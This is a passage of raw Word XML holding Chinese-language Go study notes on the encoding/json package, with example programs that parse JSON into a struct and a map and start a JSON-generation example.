        </w:rPr>
        <w:t>encoding</w:t>
      </w:r>
      <w:r w:rsidR="00E84A85">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00E51F77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理</w:t>
      </w:r>
      <w:r w:rsidR="00E84A85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r w:rsidR="00E51F77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00E51F77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>csv</w:t>
      </w:r>
      <w:bookmarkEnd w:id="346"/>
    </w:p>
    <w:p w14:paraId="43C45FA5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F961B47" w14:textId="0D94CBD3" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:https://blog.csdn.net/wade3015/article/details/88401969</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205C255C" w14:textId="0A120DBF" w:rsidR="00BE15B2" w:rsidRDefault="00BE15B2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C44F68C" w14:textId="77777777" w:rsidR="003473F5" w:rsidRDefault="00BE15B2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE15B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>把一段</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE15B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE15B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>直接复制到</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE15B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>goland</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE15B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE15B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>goland</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE15B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>自己就会生成响应的</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE15B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE15B2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>type struct</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE15B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>可以直接指针把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>放到结构体里面，但是对于没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>键名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的纯</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[{xx:xx},{</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE15B2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>xx:xx }]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>则无法使用这个方法让</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>gol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>接收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>为自己的数据，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A60B43" w14:textId="54EE7D2C" w:rsidR="00BE15B2" w:rsidRPr="00BE15B2" w:rsidRDefault="00BE15B2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这部分内容见本节的解析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的无键名列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA14C09" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析到结构体</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EEB58E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB802F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1055C938" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461531E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "encoding/json"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3627319F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A77309" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "os"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF4E4AD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF5BAD5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>type Server struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210D4C21" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ServerName string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162E6429" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ServerIP   string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC52807" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029D51B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>type Serverslice struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685388CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    Servers []Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B425B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05170CDD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60551CAD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    var s Serverslice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3A0100" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    str := `{"servers":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184522E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   [{"serverName":"Guangzhou_Base","serverIP":"127.0.0.1"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F590A2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   {"serverName":"Beijing_Base","serverIP":"127.0.0.2"}]}`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E84FC5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    err:=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>json.Unmarshal([]byte(str), &amp;s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C48EFDD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if err!=nil{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5526CD12" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9618EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35476A28" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC05880" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println(s.Servers[0].ServerName)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610FE36A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39944D33" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09626264" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E654709" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E62DA4B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215D47AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12930520" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D38513A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "encoding/json"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6490E52D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B4D7A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C1CF27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    b := []byte(`{"IP": "127.0.0.1", "name": "SKY"}`)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1734C876" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    m := make(map[string]string)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFB20AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    err := json.Unmarshal(b, &amp;m)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63213D1A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D31E763" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        fmt.Println("Umarshal failed:", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E868BBE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AABDC81" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E370A98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    fmt.Println("m:", m)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309E38DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for k,v :=range m {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F879B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        fmt.Println(k, ":", v)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17620586" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267AA752" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A71ACC3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FD829F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6988AFB4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC97118" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "encoding/json"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A04845B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A565A58" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
